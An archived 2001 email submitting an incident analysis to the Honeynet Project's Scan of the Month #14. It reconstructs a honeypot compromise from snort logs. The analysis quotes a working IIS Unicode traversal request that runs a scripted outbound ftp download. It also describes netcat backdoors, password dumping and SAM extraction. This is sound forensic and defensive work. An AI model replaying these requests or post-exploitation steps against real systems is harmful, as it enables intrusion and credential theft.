From gmeltser@atstake.com Fri Apr 20 20:33:20 2001 Date: Fri, 20 Apr 2001 13:43:40 -0500 From: Gene Meltser To: project@honeynet.org Cc: gmeltser@atstake.com Subject: Scan of the Month #14 submission [ Part 1.1, Text/PLAIN 1 lines. ] [ Unable to print this part. ]   [ Part 2: "Attached Text" ] ===========Scan Of the Month # 14============== On Feb 4th, 2001, the system 213.116.251.162 successfully attacked and compromised the honeypot 172.16.1.106. The only source of information available for analysis is the snort binary log file of the attack. Answers 1. Which exploit(s) were used to attack the system? The attacker utilizes a modification of msadc.pl script developed by RFP (RFP 9902 RDS/IIS Advisory) as well as Microsoft IIS extended unicode directory traversal vulnerability to excecute commands on the attacked server (MS00-057). The RDS attack is identified by HTTP GETs to /msadc/msadc.dll, and subsequent HTTP POSTs to /msadc/msadc.dll/AdvancedDataFactory.Query The msdadc.pl script appears to be a stripped down version of the original, as the original would have made additional checks, such as search for common DSNs and .mdbs, as well as a dictrionary attack. The unicode attack is identified by HTTP GETS to the /msadc/.. containing unicode characters. The unicode attack allows an attacker to access any file, as well as files outside wwwroot, with IUSR_machinename rights. The attacker also utilized netcat for outbound communication from compromised host and pdump.exe, a password dumping utility. 2. How were the exploits used to attack the system? The attacker ran the modified msadc.pl script against the target system. This is visible from the analysis of the snort logs, containing strings: ....--!ADM!ROX!YOUR!WORLD!.. The attacker makes repeated attempts creating a text file containing scripted ftp commands, and establishing an outbound ftp session via the RDS vulnerability. The attacker pipes ftp commands into a created text file, then excecutes ftp -s via the RDS vulnerability. After a few unsuccessful tries, including wrong passwords, the method is abandoned, and the tools are uploaded on to the host by establishing a scripted outbound ftp connection via the unicode vulnerability: GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom The attacker uploads nc.exe, pdump.exe, samdump.dll on to the system, and establishes a listening Netcat on ports 6969 and 6968, executing cmd1.exe on established connections, and connects via netcat. 3 . What was done once access was granted? @ The attacker cleans up the ftp scripts, as well as attacker-created empty directory c:\fun, as visible in 1st netcat connection log. @ Attepts to dump passwords via pdump into yay.txt, "net session" into yay2.txt, and "net users" into heh.txt. This is done via RDS command piping, and viewing the resulting files via netcat. @ Attempts are made to add users IWAM_kenny and IUSR_kenny to the domain administrators group, as well as testuser as the system administrator though RDS exploit, as well as through netcat. @ Total of three successful netcat connections are made to the box, as the attacker syncs the SAM hive file via "rdisk -s" command, and then pipes the resulting updated backup file sam._ into heh.txt, which he grabs by placing it in wwwroot. The attacker also explores the system, including the /wiretrip directory, containing the original masadc1.pl and msadc2.pl scripts and whisker.tar.gz, as well as other tools by RFP, and succesfully downloads whisker.tar.gz from the compromised host. 4. How could this attack been prevented? The attack could have been prevented by applying appropriate patches, and in case of the Unicode vulnerability, applying patches released with MS00-057 advisory, as well as actively monitoring for subsequent patch releases. If Microsoft RDS is not needed on the system, disabling the RDS by deleting unnessecary examples and dlls from the server, such as msadc.dll. Further, firewall rulesets should be tightened to deny outbound connections on arbitrary ports, and deny outbound port 80 if session is not already established. 5. How much time spent on analysis? Total time: 16 Hours. Bonus: Did the attacker know it was a honepot? Why or why not? The attacker knew it was a honeypot, as evident by the 3rd connection's netcat log: C:\> C:\>echo best honeypot i've seen till now :) > rfp.txt I belive the attacker realized he was on the honeypot for a variety of reasons. 1. The above statement implies the attcker has been on a honeypot before, thus he/she knows what a honeypot looks like. 2. The attacked system exhibits characteristics of "soft on the outside, hard on the inside", which is inconsistent and highly suspicious. The attacker gained access to the system through a well known and old vulnerability, sugesting an unpatched default installation However, when the attacker created and subsequently tried to delete a file in \wwwroot, access was denied, suggesting explicitly set permissions on the directory tree. This is inconsistent with the default install. 3. The compromised server contains numerous references to RFP, as evident by \wiretrip directory, where RFP's guestbook is located, as well as \exploits directory. --- Gene Meltser @stake, Inc. 04/09/2000